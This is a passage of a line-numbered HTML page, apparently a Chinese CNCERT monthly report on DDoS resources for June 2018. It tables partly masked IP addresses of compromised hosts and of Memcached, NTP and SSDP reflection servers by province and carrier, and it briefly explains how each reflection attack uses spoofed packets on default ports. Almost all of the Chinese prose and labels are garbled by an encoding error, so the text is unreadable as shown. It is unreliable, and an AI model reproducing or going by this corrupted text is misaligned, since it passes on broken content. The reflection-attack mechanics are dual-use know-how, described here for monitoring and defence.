2439<tr>
2440<td>112.X.X.146</td>
2441<td>安徽çœ</td>
2442<td>è”通</td>
2443</tr>
2444<tr>
2445<td>111.X.X.53</td>
2446<td>剿ž—çœ</td>
2447<td>移动</td>
2448</tr>
2449<tr>
2450<td>114.X.X.253</td>
2451<td>北京市</td>
2452<td>待确认</td>
2453</tr>
2454<tr>
2455<td>116.X.X.243</td>
2456<td>æ²³å—çœ</td>
2457<td>è”通</td>
2458</tr>
2459<tr>
2460<td>125.X.X.214</td>
2461<td>北京市</td>
2462<td>è”通</td>
2463</tr>
2464<tr>
2465<td>119.X.X.110</td>
2466<td>å®å¤å›žæ—自治区</td>
2467<td>电信</td>
2468</tr>
2469<tr>
2470<td>39.X.X.51</td>
2471<td>江西çœ</td>
2472<td>移动</td>
2473</tr>
2474<tr>
2475<td>61.X.X.114</td>
2476<td>æ²³å—çœ</td>
2477<td>è”通</td>
2478</tr>
2479<tr>
2480<td>114.X.X.11</td>
2481<td>北京市</td>
2482<td>è”通</td>
2483</tr>
2484</tbody>
2485</table>
2486<p style="text-align: justify;">2018å¹´1月至今监测到的肉鸡资æºä¸ï¼Œå…±è®¡14,451个肉鸡在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸ä½äºŽæˆ‘国境内的肉鸡数é‡ä¸º11,620个,ä½äºŽå¢ƒå¤–的肉鸡数é‡ä¸º2,831个。2018å¹´1月至今被æŒç»åˆ©ç”¨å‘èµ·DDoS攻击最多的肉鸡TOP20åŠå½’属如表4所示,ä½äºŽå±±è¥¿çœçš„åœ°å€æœ€å¤šã€‚</p>
2487<p style="text-align: center;">表4 2018年以æ¥è¢«åˆ©ç”¨å‘èµ·DDoSæ”»å‡»æ•°é‡æŽ’åTOP20,且在本月æŒç»æ´»è·ƒçš„è‚‰é¸¡åœ°å€ </p>
2488<table>
2489<colgroup>
2490<col>
2491<col>
2492<col> </colgroup>
2493<thead>
2494<tr>
2495<th>肉鸡地å€</th>
2496<th>归属çœä»½</th>
2497<th>归属è¿è¥å•†</th>
2498</tr>
2499</thead>
2500<tbody>
2501<tr>
2502<td>58.X.X.148</td>
2503<td>山东çœ</td>
2504<td>电信</td>
2505</tr>
2506<tr>
2507<td>124.X.X.2</td>
2508<td>山西çœ</td>
2509<td>è”通</td>
2510</tr>
2511<tr>
2512<td>123.X.X.32</td>
2513<td>内蒙å¤è‡ªæ²»åŒº</td>
2514<td>电信</td>
2515</tr>
2516<tr>
2517<td>122.X.X.199</td>
2518<td>æ²³å—çœ</td>
2519<td>è”通</td>
2520</tr>
2521<tr>
2522<td>183.X.X.66</td>
2523<td>山西çœ</td>
2524<td>移动</td>
2525</tr>
2526<tr>
2527<td>111.X.X.2</td>
2528<td>山西çœ</td>
2529<td>移动</td>
2530</tr>
2531<tr>
2532<td>60.X.X.211</td>
2533<td>山西çœ</td>
2534<td>è”通</td>
2535</tr>
2536<tr>
2537<td>106.X.X.223</td>
2538<td>新疆维å¾å°”æ—自治区</td>
2539<td>电信</td>
2540</tr>
2541<tr>
2542<td>124.X.X.2</td>
2543<td>æ²³å—çœ</td>
2544<td>è”通</td>
2545</tr>
2546<tr>
2547<td>118.X.X.101</td>
2548<td>å››å·çœ</td>
2549<td>电信</td>
2550</tr>
2551<tr>
2552<td>112.X.X.146</td>
2553<td>安徽çœ</td>
2554<td>è”通</td>
2555</tr>
2556<tr>
2557<td>111.X.X.53</td>
2558<td>剿ž—çœ</td>
2559<td>移动</td>
2560</tr>
2561<tr>
2562<td>114.X.X.253</td>
2563<td>北京市</td>
2564<td>待确认</td>
2565</tr>
2566<tr>
2567<td>116.X.X.243</td>
2568<td>æ²³å—çœ</td>
2569<td>è”通</td>
2570</tr>
2571<tr>
2572<td>39.X.X.51</td>
2573<td>江西çœ</td>
2574<td>移动</td>
2575</tr>
2576<tr>
2577<td>61.X.X.114</td>
2578<td>æ²³å—çœ</td>
2579<td>è”通</td>
2580</tr>
2581<tr>
2582<td>114.X.X.11</td>
2583<td>北京市</td>
2584<td>è”通</td>
2585</tr>
2586<tr>
2587<td>183.X.X.15</td>
2588<td>北京市</td>
2589<td>待确认</td>
2590</tr>
2591<tr>
2592<td>122.X.X.13</td>
2593<td>æ²³å—çœ</td>
2594<td>电信</td>
2595</tr>
2596<tr>
2597<td>61.X.X.28</td>
2598<td>甘肃çœ</td>
2599<td>电信</td>
2600</tr>
2601</tbody>
2602</table>
2603<p style="text-align: justify;">2018å¹´1月至今æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡èµ„æºæŒ‰çœä»½ç»Ÿè®¡ï¼Œæµ™æ±Ÿçœå 的比例最大,å 11.6%,其次是山东çœã€å››å·çœå’Œå¹¿ä¸œçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 63.1%,è”通å 15.2%,移动å 12.4%,如图5所示。</p>
2604<p><img alt="2018å¹´ä»¥æ¥æŒç»æ´»è·ƒçš„è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138839984.png!small" width="690" height="306.38532110091745"></p>
2605<p style="text-align: center;">图5 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒçš„è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ </p>
2606<h3>3. å射攻击资æºåˆ†æž</h3>
2607<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用åå°„æœåС噍å‘起的三类é‡ç‚¹å射攻击共涉åŠ3,689,197å°åå°„æœåŠ¡å™¨ï¼Œå…¶ä¸å¢ƒå†…åå°„æœåС噍3,451,932å°ï¼Œå¢ƒå¤–åå°„æœåС噍237,265å°ã€‚å射攻击所利用Memcachedåå°„æœåС噍å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰16,055å°ï¼Œå 比0.4%,其ä¸å¢ƒå†…åå°„æœåС噍13,410å°ï¼Œå¢ƒå¤–åå°„æœåС噍2,645å°ï¼›åˆ©ç”¨NTPåå°„å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰772,835å°ï¼Œå 比20.9%,其ä¸å¢ƒå†…åå°„æœåС噍754,496å°ï¼Œå¢ƒå¤–åå°„æœåС噍18,339å°ï¼›åˆ©ç”¨SSDPåå°„å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰2,900,307å°ï¼Œå 比78.6%,其ä¸å¢ƒå†…åå°„æœåС噍2,684,026å°ï¼Œå¢ƒå¤–åå°„æœåС噍216,281å°ã€‚</p>
2608<p style="text-align: justify;"><b>(1)Memcachedåå°„æœåŠ¡å™¨èµ„æº</b> </p>
2609</p>
2610<p style="text-align: justify;">Memcachedå射攻击利用了在互è”网上暴露的大批é‡MemcachedæœåŠ¡å™¨ï¼ˆä¸€ç§åˆ†å¸ƒå¼ç¼“å˜ç³»ç»Ÿï¼‰å˜åœ¨çš„认è¯å’Œè®¾è®¡ç¼ºé™·ï¼Œæ”»å‡»è€…通过å‘MemcachedæœåС噍IP地å€çš„默认端å£11211å‘é€ä¼ªé€ å—害者IP地å€çš„特定指令UDPæ•°æ®åŒ…,使MemcachedæœåС噍å‘å—害者IP地å€è¿”回比请求数æ®åŒ…大数å€çš„æ•°æ®ï¼Œä»Žè€Œè¿›è¡Œå射攻击。</p>
2611</p>
2612<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用MemcachedæœåŠ¡å™¨å®žæ–½å射攻击的事件共涉åŠå¢ƒå†…13,410å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–2,645å°åå°„æœåŠ¡å™¨ã€‚</p>
2613</p>
2614<p style="text-align: justify;">本月境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œå±±ä¸œçœå 的比例最大,å 15.3%,其次是广东çœã€åŒ—京市和浙江çœï¼›æŒ‰å½’属è¿è¥å•†æˆ–云æœåŠ¡å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 36.7%ï¼Œç§»åŠ¨å æ¯”25.9%,è”é€šå æ¯”20.6%ï¼Œé˜¿é‡Œäº‘å æ¯”8.4%,如图6所示。</p>
2615</p>
2616<p><img alt="本月境内Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ã€è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324139049235.png!small" width="690" height="313.39694656488547"></p>
2617</p>
2618<p style="text-align: center;">图6 本月境内Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ã€è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ</p>
2619</p>
2620<p style="text-align: justify;">本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,美国å 的比例最大,å 37.5%,其次是ä¸å›½é¦™æ¸¯ã€åŠ æ‹¿å¤§å’Œæ³•å›½ï¼Œå¦‚å›¾7所示。</p>
2621</p>
2622<p style="text-align: justify;"><img alt="本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布" src="http://image.3001.net/images/20180724/15324139675754.png!small" width="555" height="406.19565217391306"></p>
2623</p>
2624<p style="text-align: center;">图7 本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布</p>
2625</p>
2626<p style="text-align: justify;">本月境内å‘èµ·å射攻击事件数é‡TOP100ä¸ç›®å‰ä»å˜æ´»çš„memcachedæœåС噍åŠå½’属如表5所示,ä½äºŽåŒ—京市和河å—çœçš„åœ°å€æœ€å¤šã€‚</p>
2627</p>
2628<p style="text-align: center;">表5 本月境内å‘èµ·å射攻击事件数é‡TOP100ä¸ä»å˜æ´»çš„MemcachedæœåС噍TOP30</p>
2629</p>
2630<table>
2631<colgroup>
2632<col>
2633<col>
2634<col> </colgroup>
2635<thead>
2636<tr>
2637<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2638<th>归属çœä»½</th>
2639<th>归属è¿è¥å•†æˆ–云æœåС商</th>
2640</tr>
2641</thead>
2642<tbody>
2643<tr>
2644<td>106.X.X.51</td>
2645<td>北京市</td>
2646<td>电信</td>
2647</tr>
2648<tr>
2649<td>122.X.X.232</td>
2650<td>æ²³å—çœ</td>
2651<td>è”通</td>
2652</tr>
2653<tr>
2654<td>122.X.X.38</td>
2655<td>æ²³å—çœ</td>
2656<td>è”通</td>
2657</tr>
2658<tr>
2659<td>58.X.X.166</td>
2660<td>山东çœ</td>
2661<td>电信</td>
2662</tr>
2663<tr>
2664<td>116.X.X.114</td>
2665<td>æ²³å—çœ</td>
2666<td>è”通</td>
2667</tr>
2668<tr>
2669<td>123.X.X.118</td>
2670<td>北京市</td>
2671<td>阿里云</td>
2672</tr>
2673<tr>
2674<td>116.X.X.206</td>
2675<td>æ²³å—çœ</td>
2676<td>è”通</td>
2677</tr>
2678<tr>
2679<td>116.X.X.102</td>
2680<td>æ²³å—çœ</td>
2681<td>è”通</td>
2682</tr>
2683<tr>
2684<td>116.X.X.195</td>
2685<td>æ²³å—çœ</td>
2686<td>è”通</td>
2687</tr>
2688<tr>
2689<td>101.X.X.82</td>
2690<td>北京市</td>
2691<td>阿里云</td>
2692</tr>
2693<tr>
2694<td>101.X.X.42</td>
2695<td>北京市</td>
2696<td>阿里云</td>
2697</tr>
2698<tr>
2699<td>182.X.X.107</td>
2700<td>北京市</td>
2701<td>阿里云</td>
2702</tr>
2703<tr>
2704<td>116.X.X.252</td>
2705<td>æ²³å—çœ</td>
2706<td>è”通</td>
2707</tr>
2708<tr>
2709<td>123.X.X.151</td>
2710<td>北京市</td>
2711<td>阿里云</td>
2712</tr>
2713<tr>
2714<td>123.X.X.195</td>
2715<td>北京市</td>
2716<td>阿里云</td>
2717</tr>
2718<tr>
2719<td>119.X.X.93</td>
2720<td>北京市</td>
2721<td>电信</td>
2722</tr>
2723<tr>
2724<td>116.X.X.34</td>
2725<td>æ²³å—çœ</td>
2726<td>è”通</td>
2727</tr>
2728<tr>
2729<td>123.X.X.233</td>
2730<td>北京市</td>
2731<td>阿里云</td>
2732</tr>
2733<tr>
2734<td>202.X.X.240</td>
2735<td>新疆维å¾å°”æ—自治区</td>
2736<td>电信</td>
2737</tr>
2738<tr>
2739<td>122.X.X.188</td>
2740<td>山东çœ</td>
2741<td>电信</td>
2742</tr>
2743<tr>
2744<td>117.X.X.92</td>
2745<td>陕西çœ</td>
2746<td>电信</td>
2747</tr>
2748<tr>
2749<td>101.X.X.97</td>
2750<td>北京市</td>
2751<td>阿里云</td>
2752</tr>
2753<tr>
2754<td>119.X.X.156</td>
2755<td>北京市</td>
2756<td>电信</td>
2757</tr>
2758<tr>
2759<td>119.X.X.137</td>
2760<td>北京市</td>
2761<td>电信</td>
2762</tr>
2763<tr>
2764<td>117.X.X.58</td>
2765<td>æ²³å—çœ</td>
2766<td>移动</td>
2767</tr>
2768<tr>
2769<td>120.X.X.23</td>
2770<td>安徽çœ</td>
2771<td>移动</td>
2772</tr>
2773<tr>
2774<td>122.X.X.100</td>
2775<td>æ²³å—çœ</td>
2776<td>è”通</td>
2777</tr>
2778<tr>
2779<td>123.X.X.237</td>
2780<td>北京市</td>
2781<td>阿里云</td>
2782</tr>
2783<tr>
2784<td>116.X.X.233</td>
2785<td>云å—çœ</td>
2786<td>电信</td>
2787</tr>
2788</tbody>
2789</table>
2790<p style="text-align: justify;">近两月至今被利用å‘起攻击的Memcachedåå°„æœåС噍ä¸ï¼Œå…±è®¡4,215个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸2,718个ä½äºŽå¢ƒå†…,1,497个ä½äºŽå¢ƒå¤–。近两月至今被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œå¹¿ä¸œçœå 的比例最大,å 18.7%ï¼Œå…¶æ¬¡æ˜¯åŒ—äº¬å¸‚ã€æµ™æ±Ÿçœã€å’Œå±±ä¸œçœï¼›æŒ‰è¿è¥å•†æˆ–云æœåŠ¡å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 30.5%,阿里云å 28.0%,è”通å 14.3%,移动å 11.1%,如图8所示。</p>
2791</p>
2792<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140095736.png!small" width="690" height="324.4864864864865"></p>
2793</p>
2794<p style="text-align: center;">图8 近两月被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ</p>
2795</p>
2796<p><b>(2)NTPåå°„æœåŠ¡å™¨èµ„æº</b></p>
2797</p>
2798<p style="text-align: justify;">NTPå射攻击利用了NTP(一ç§é€šè¿‡äº’è”网æœåŠ¡äºŽè®¡ç®—æœºæ—¶é’ŸåŒæ¥çš„å议)æœåС噍å˜åœ¨çš„å议脆弱性,攻击者通过å‘NTPæœåС噍IP地å€çš„默认端å£123å‘é€ä¼ªé€ å—害者IP地å€çš„Monlist指令数æ®åŒ…,使NTPæœåС噍å‘å—害者IP地å€å射返回比原始数æ®åŒ…大数å€çš„æ•°æ®ï¼Œä»Žè€Œè¿›è¡Œå射攻击。 </p>
2799</p>
2800<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,NTPåå°„æ”»å‡»äº‹ä»¶å…±æ¶‰åŠæˆ‘国境内754,496å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–18,339å°åå°„æœåŠ¡å™¨ã€‚è¢«åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ€»é‡è¾ƒä¸Šæœˆæœ‰ä¸€å®šæ•°é‡çš„回è½ã€‚</p>
2801</p>
2802<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œå¹¿ä¸œçœå 的比例最大,å 15.6%,其次是山东çœã€ç”˜è‚ƒçœå’Œæ±Ÿè‹çœï¼›æŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç§»åЍå 的比例最大,å 39.9%ï¼Œç”µä¿¡å æ¯”39.4%,è”é€šå æ¯”19.1%,如图9所示。</p>
2803</p>
2804<p><img alt="本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140252632.png!small" width="690" height="316.8239564428312"></p>
2805</p>
2806<p style="text-align: center;">图9 本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2807</p>
2808<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,澳大利亚å 的比例最大,å 76.1%,其次是美国ã€å·´åŸºæ–¯å¦å’Œå°åº¦ï¼Œå¦‚图10所示。</p>
2809</p>
2810<p><img alt="本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布" src="http://image.3001.net/images/20180724/15324140388839.png!small" width="555" height="412.09580838323353"> </p>
2811</p>
2812<p style="text-align: center;">图10 本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布</p>
2813</p>
2814<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æŒ‰è¢«åˆ©ç”¨å‘èµ·æ”»å‡»æ•°é‡æŽ’åTOP25åŠå½’属如表6所示,ä½äºŽå±±ä¸œçœå’Œå®å¤å›žæ—è‡ªæ²»åŒºçš„åœ°å€æœ€å¤šã€‚</p>
2815</p>
2816<p style="text-align: justify;">
2817</p>
2818<p style="text-align: center;">表6 本月境内被利用å‘èµ·NTPå射攻击的åå°„æœåŠ¡å™¨æŒ‰æ¶‰äº‹ä»¶æ•°é‡TOP25</p>
2819</p>
2820<table>
2821<colgroup>
2822<col>
2823<col>
2824<col> </colgroup>
2825<thead>
2826<tr>
2827<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2828<th>归属çœä»½</th>
2829<th>归属è¿è¥å•†</th>
2830</tr>
2831</thead>
2832<tbody>
2833<tr>
2834<td>58.X.X.44</td>
2835<td>贵州çœ</td>
2836<td>è”通</td>
2837</tr>
2838<tr>
2839<td>111.X.X.208</td>
2840<td>山西çœ</td>
2841<td>移动</td>
2842</tr>
2843<tr>
2844<td>222.X.X.199</td>
2845<td>å®å¤å›žæ—自治区</td>
2846<td>电信</td>
2847</tr>
2848<tr>
2849<td>111.X.X.203</td>
2850<td>æ¹–å—çœ</td>
2851<td>移动</td>
2852</tr>
2853<tr>
2854<td>112.X.X.253</td>
2855<td>山东çœ</td>
2856<td>移动</td>
2857</tr>
2858<tr>
2859<td>112.X.X.251</td>
2860<td>山东çœ</td>
2861<td>移动</td>
2862</tr>
2863<tr>
2864<td>119.X.X.174</td>
2865<td>å®å¤å›žæ—自治区</td>
2866<td>电信</td>
2867</tr>
2868<tr>
2869<td>218.X.X.38</td>
2870<td>å®å¤å›žæ—自治区</td>
2871<td>电信</td>
2872</tr>
2873<tr>
2874<td>111.X.X.116</td>
2875<td>山东çœ</td>
2876<td>移动</td>
2877</tr>
2878<tr>
2879<td>61.X.X.190</td>
2880<td>å®å¤å›žæ—自治区</td>
2881<td>电信</td>
2882</tr>
2883<tr>
2884<td>111.X.X.168</td>
2885<td>山东çœ</td>
2886<td>移动</td>
2887</tr>
2888<tr>
2889<td>112.X.X.202</td>
2890<td>山东çœ</td>
2891<td>移动</td>
2892</tr>
2893<tr>
2894<td>218.X.X.130</td>
2895<td>å®å¤å›žæ—自治区</td>
2896<td>电信</td>
2897</tr>
2898<tr>
2899<td>14.X.X.143</td>
2900<td>å®å¤å›žæ—自治区</td>
2901<td>电信</td>
2902</tr>
2903<tr>
2904<td>120.X.X.162</td>
2905<td>山东çœ</td>
2906<td>移动</td>
2907</tr>
2908<tr>
2909<td>112.X.X.75</td>
2910<td>山东çœ</td>
2911<td>移动</td>
2912</tr>
2913<tr>
2914<td>111.X.X.204</td>
2915<td>æ¹–å—çœ</td>
2916<td>移动</td>
2917</tr>
2918<tr>
2919<td>123.X.X.126</td>
2920<td>内蒙å¤è‡ªæ²»åŒº</td>
2921<td>电信</td>
2922</tr>
2923<tr>
2924<td>111.X.X.234</td>
2925<td>山西çœ</td>
2926<td>移动</td>
2927</tr>
2928<tr>
2929<td>218.X.X.10</td>
2930<td>å®å¤å›žæ—自治区</td>
2931<td>电信</td>
2932</tr>
2933<tr>
2934<td>223.X.X.173</td>
2935<td>山东çœ</td>
2936<td>移动</td>
2937</tr>
2938<tr>
2939<td>211.X.X.188</td>
2940<td>山西çœ</td>
2941<td>移动</td>
2942</tr>
2943<tr>
2944<td>222.X.X.131</td>
2945<td>æ²³å—çœ</td>
2946<td>电信</td>
2947</tr>
2948<tr>
2949<td>111.X.X.88</td>
2950<td>山东çœ</td>
2951<td>移动</td>
2952</tr>
2953<tr>
2954<td>223.X.X.82</td>
2955<td>山东çœ</td>
2956<td>移动</td>
2957</tr>
2958</tbody>
2959</table>
2960<p style="text-align: justify;">近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåС噍ä¸ï¼Œå…±è®¡27,539个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸26,063个ä½äºŽå¢ƒå†…,1,476个ä½äºŽå¢ƒå¤–。近两月æŒç»æ´»è·ƒçš„NTPåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œæ²³å—çœå 的比例最大,å 36.1%,其次是å®å¤å›žæ—è‡ªæ²»åŒºã€æ¹–北çœå’Œæ¹–å—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 44.3%,移动å 24.3%,è”通å 19.9%,如图11所示。</p>
2961</p>
2962<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140526831.png!small" width="690" height="362.2181146025878"></p>
2963</p>
2964<p style="text-align: center;">图11 近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ</p>
2965</p>
2966<p style="text-align: justify;"><b>(3)SSDPåå°„æœåŠ¡å™¨èµ„æº</b></p>
2967</p>
2968<p style="text-align: justify;">SSDPå射攻击利用了SSDP(一ç§åº”用层å议,是构æˆé€šç”¨å³æ’å³ç”¨(UPnP)æŠ€æœ¯çš„æ ¸å¿ƒå议之一)æœåС噍å˜åœ¨çš„å议脆弱性,攻击者通过å‘SSDPæœåС噍IP地å€çš„默认端å£1900å‘é€ä¼ªé€ å—害者IP地å€çš„æŸ¥è¯¢è¯·æ±‚,使SSDPæœåС噍å‘å—害者IP地å€å射返回比原始数æ®åŒ…大数å€çš„åº”ç”æ•°æ®åŒ…,从而进行å射攻击。</p>
2969</p>
2970<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,SSDPå射攻击事件共涉åŠå¢ƒå†…2,684,026å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–216,281å°åå°„æœåŠ¡å™¨ã€‚</p>
2971</p>
2972<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œè¾½å®çœå 的比例最大,å 17.3%,其次是江è‹çœã€æ²³å—çœå’Œæµ™æ±Ÿçœï¼›æŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 54.9%ï¼Œç”µä¿¡å æ¯”41.4%ï¼Œç§»åŠ¨å æ¯”3.3%,如图12所示。</p>
2973<p><img alt="本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/1532414065800.png!small" width="690" height="311.95402298850576"> </p>
2974</p>
2975<p style="text-align: center;">图12 本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2976</p>
2977<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,美国å 的比例最大,å 30.9%,其次是ä¸å›½å°æ¹¾ã€åŠ æ‹¿å¤§å’ŒéŸ©å›½ï¼Œå¦‚å›¾13所示。</p>
2978</p>
2979<p><img alt="本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区或地区分布" src="http://image.3001.net/images/20180724/15324140793672.png!small" width="555" height="440.7826086956522"> </p>
2980</p>
2981<p style="text-align: center;">图13 本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区或地区分布</p>
2982</p>
2983<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æŒ‰è¢«åˆ©ç”¨å‘èµ·æ”»å‡»æ•°é‡æŽ’åTOP20çš„åå°„æœåС噍åŠå½’属如表7所示,ä½äºŽäº‘å—çœå’Œå±±ä¸œçœçš„åœ°å€æœ€å¤šã€‚</p>
2984</p>
2985<p style="text-align: center;">表7 本月境内被利用å‘èµ·SSDPå射攻击事件数é‡ä¸æŽ’åTOP20çš„åå°„æœåС噍</p>
2986</p>
2987<table>
2988<colgroup>
2989<col>
2990<col>
2991<col> </colgroup>
2992<thead>
2993<tr>
2994<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2995<th>归属çœä»½</th>
2996<th>归属è¿è¥å•†</th>
2997</tr>
2998</thead>
2999<tbody>
3000<tr>
3001<td>218.X.X.185</td>
3002<td>云å—çœ</td>
3003<td>电信</td>
3004</tr>
3005<tr>
3006<td>111.X.X.12</td>
3007<td>黑龙江çœ</td>
3008<td>移动</td>
3009</tr>
3010<tr>
3011<td>113.X.X.14</td>
3012<td>广西壮æ—自治区</td>
3013<td>电信</td>
3014</tr>
3015<tr>
3016<td>202.X.X.51</td>
3017<td>贵州çœ</td>
3018<td>电信</td>
3019</tr>
3020<tr>
3021<td>222.X.X.6</td>
3022<td>山东çœ</td>
3023<td>电信</td>
3024</tr>
3025<tr>
3026<td>218.X.X.186</td>
3027<td>云å—çœ</td>
3028<td>电信</td>
3029</tr>
3030<tr>
3031<td>222.X.X.6</td>
3032<td>山东çœ</td>
3033<td>电信</td>
3034</tr>
3035<tr>
3036<td>183.X.X.56</td>
3037<td>æ¹–å—çœ</td>
3038<td>移动</td>
3039</tr>
3040<tr>
3041<td>61.X.X.6</td>
3042<td>å®å¤å›žæ—自治区</td>
3043<td>电信</td>
3044</tr>
3045<tr>
3046<td>221.X.X.8</td>
3047<td>å››å·çœ</td>
3048<td>电信</td>
3049</tr>
3050<tr>
3051<td>106.X.X.14</td>
3052<td>内蒙å¤è‡ªæ²»åŒº</td>
3053<td>电信</td>
3054</tr>
3055<tr>
3056<td>116.X.X.15</td>
3057<td>云å—çœ</td>
3058<td>电信</td>
3059</tr>
3060<tr>
3061<td>58.X.X.142</td>
3062<td>山东çœ</td>
3063<td>电信</td>
3064</tr>
3065<tr>
3066<td>218.X.X.18</td>
3067<td>云å—çœ</td>
3068<td>电信</td>
3069</tr>
3070<tr>
3071<td>218.X.X.62</td>
3072<td>å®å¤å›žæ—自治区</td>
3073<td>电信</td>
3074</tr>
3075<tr>
3076<td>222.X.X.54</td>
3077<td>山东çœ</td>
3078<td>电信</td>
3079</tr>
3080<tr>
3081<td>222.X.X.10</td>
3082<td>é‡åº†å¸‚</td>
3083<td>电信</td>
3084</tr>
3085<tr>
3086<td>220.X.X.102</td>
3087<td>æ¹–å—çœ</td>
3088<td>电信</td>
3089</tr>
3090<tr>
3091<td>222.X.X.22</td>
3092<td>å®å¤å›žæ—自治区</td>
3093<td>电信</td>
3094</tr>
3095<tr>
3096<td>111.X.X.11</td>
3097<td>黑龙江çœ</td>
3098<td>移动</td>
3099</tr>
3100</tbody>
3101</table>
